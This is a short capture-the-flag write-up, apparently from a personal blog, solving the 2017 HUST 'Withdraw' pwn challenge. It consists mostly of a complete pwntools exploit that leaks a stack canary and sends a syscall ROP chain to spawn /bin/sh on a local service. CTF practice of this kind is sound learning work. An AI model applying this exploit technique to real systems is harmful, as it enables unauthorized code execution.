9oat's LAB
[2017 HUST] Withdraw
```python
from pwn import *

s = remote("127.0.0.1", 8888)

# Gadget and section addresses taken from the statically linked binary
pppr  = p32(0x806f280)  # pop edx ; pop ecx ; pop ebx ; ret
eax   = p32(0x8048882)  # pop eax ; ret
int80 = p32(0x806f870)  # int 0x80
bss   = p32(0x80ea3d0)
binsh = b"/bin/sh"

print("[*] Start")

# Menu 2: fill the 64-byte buffer plus one extra byte so the canary's
# null low byte is overwritten and the canary is echoed back
s.recvuntil(b": ")
s.send(b"2\n")
s.recvuntil(b") ")
s.send(b"y\n")
s.recvuntil(b".\n")
s.send(b"a" * 64 + b"x")
s.recvn(68)
canary = u32(s.recvn(4)) - 0x78   # undo the "x" (0x78) that replaced the low byte
print("[*] Canary Leak : " + hex(canary))
canary = p32(canary)

# Menu 1: overflow with the recovered canary, then the syscall ROP chain
s.recvuntil(b": ")
s.send(b"1\n")
s.recvuntil(b": ")
s.send(b"9047\n")
s.recvuntil(b": ")

pay  = b"a" * 32
pay += canary
pay += b"a" * 4
pay += pppr        # read(0, bss, 7)
pay += p32(7)
pay += bss
pay += p32(0)
pay += eax
pay += p32(3)      # SYS_read
pay += int80
pay += pppr        # execve(bss, 0, 0)
pay += p32(0)
pay += p32(0)
pay += bss
pay += eax
pay += p32(11)     # SYS_execve
pay += int80

s.send(pay + b"\n")
s.send(binsh + b"\n")
s.interactive()
```
This was my first time solving a statically linked challenge. Same goes for the canary.
I used peda's ropsearch to find suitable gadgets, and the challenge is solved with a system-call-based ROP chain.

`ropsearch "int 0x80"`